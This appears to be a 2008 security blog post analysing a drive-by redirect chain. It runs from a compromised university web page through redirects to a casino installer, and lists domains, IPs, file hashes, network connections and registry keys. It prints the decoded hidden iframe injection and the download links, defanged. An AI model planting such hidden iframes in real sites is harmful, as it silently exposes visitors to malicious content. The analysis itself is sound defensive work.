On 9 November 2008, a college university web page hosted obfuscated JavaScript that when decoded revealed an iframe to hxxp://amhvcketn.com/ld/ment/ (66.232.111.112). The following analysis tracks the redirect results.
<div style="visibility:hidden"><iframe src="hxxp://amhvcketn.com/ld/ment/" width=100 height=80></iframe></div>
The hxxp://amhvcketn.com/ld/ment/ request returned an HTTP 302 redirect to hxxp://amhvcketn.com/cgi-bin/index.cgi?mentat
The hxxp://amhvcketn.com/cgi-bin/index.cgi?mentat request returned an HTTP 302 redirect to hxxp://for777daily.com/479/.
The hxxp://for777daily.com/479/ request returned advertising content for a Gold Casino promotion.
“Download” and “Play Now!” buttons download hxxp://for777daily.com/479/SmartDownload.exe
<a href="SmartDownload.exe"><img src="images/download.gif" width="271" height="83" alt="" border="0"></a>
<a href="SmartDownload.exe"><img src="images/playnow.gif" width="96" height="124" alt="" border="0"></a>
Domain Analysis:
amhvcketn.com is registered in RU and 66.232.111.112 is registered to NOC4Hosts Inc., US.
Several other malicious domains resolved to 66.232.111.112 at the time of analysis.
adk2lev.com
aqlgdjeni.com
avegeni.com
biedetn.com
bov2bllev.com
brzgeni.com
dfn2etn.com
fhp4etn.com
fqmgdjeni.com
frzvetn.com
giqgetn.com
gsagcketn.com
gsajetn.com
htb4cketn.com
htbgetn.com
ikfjcketn.com
iucvetn.com
jlgvcketn.com
for777daily.com is registered in RU and 58.20.129.158 is registered in China.
SmartDownload.exe Analysis:
SmartDownload.exe
ea93453c6392e17fc3f858dd1d08b7f3
466,752 bytes
Upon execution SmartDownload.exe creates the C:\Program Files\Gold VIP Club Casino directory and opens an installer window.
SmartDownload.exe connects to locator.realtimegaming.com (200.122.168.237) on TCP port 20000 to receive C2. The client sends the string “Gold VIP Club Casino” and receives the string “200.122.168.189”. A second connection returns the string hxxp://download.realtimegaming.com/cdn/goldvipclub. The client connects to download.realtimegaming.com which uses Akamai caching to download the installation files package_list.ini.crc and package_list.ini.zip.
GET /cdn/goldvipclub/package_list.ini.crc HTTP/1.1 Host: download.realtimegaming.com
GET /cdn/goldvipclub/package_list.ini.zip HTTP/1.1 Host: download.realtimegaming.com
The domain realtimegaming.com is registered to RealTime Gaming Holding Company, LLC (Costa Rica).
Reverse lookups for 200.122.168.237 rotate through several casino themed domains.
affiliateglobal.clubusacasino.com
mycasinoaccounts.com
affiliateglobal.clubusacasino.net
api.mycasinoaccounts.com
integrations.mycasinoaccounts.com
www.mycasinoaccounts.com
cs.realtimegaming.com
globalaffiliates.betmaxcasino.com
The following major files are created.
c:\Program Files\Gold VIP Club Casino\casino.dll
27cc0f7692c95d15a43b8e1221cb2e3f
745,472 bytes
c:\Program Files\Gold VIP Club Casino\casino.exe
7bcfafbe500a3b440e9b18431997022a
30,720 bytes
The following major registry keys are added to launch Gold VIP Club Casino at statup.
HKEY_CLASSES_ROOT\CLSID\{0CBAA404-8C7F-4070-8E42-8847E2394816} "(Default)"
Type: REG_SZ
Data: Gold Vip Club Casino
HKEY_CLASSES_ROOT\CLSID\{0CBAA404-8C7F-4070-8E42-8847E2394816}\LocalServer32 "(Default)"
Type: REG_SZ
Data: c:\program files\gold vip club casino\casino.exe %1
HKEY_CLASSES_ROOT\CLSID\{0CBAA404-8C7F-4070-8E42-8847E2394816}\ProgID "(Default)"
Type: REG_SZ
Data: rtg.goldvipclub
HKEY_CLASSES_ROOT\rtg.goldvipclub "(Default)"
Type: REG_SZ
Data: URL: Realtime Gaming Protocol
HKEY_CLASSES_ROOT\rtg.goldvipclub "URL Protocol"
Type: REG_SZ
Data:
HKEY_CLASSES_ROOT\rtg.goldvipclub\CLSID "(Default)"
Type: REG_SZ
Data: {0CBAA404-8C7F-4070-8E42-8847E2394816}
HKEY_CLASSES_ROOT\rtg.goldvipclub\DefaultIcon "(Default)"
Type: REG_SZ
Data: casino.exe
HKEY_CLASSES_ROOT\rtg.goldvipclub\shell\open\command "(Default)"
Type: REG_SZ
Data: c:\program files\gold vip club casino\casino.exe %1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Gold VIP Club Casino "DisplayName"
Type: REG_SZ
Data: Gold VIP Club Casino
The launching of Gold VIP Club Casino initiates a connection to 200.122.168.189 TCP port 22053. The casino game requires an account to be created and personal information provided. Not sure how much I would trust a game that was installed through obfuscated JavaScript, a series of redirects and deceptive advertising :)
Wednesday, November 12, 2008
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment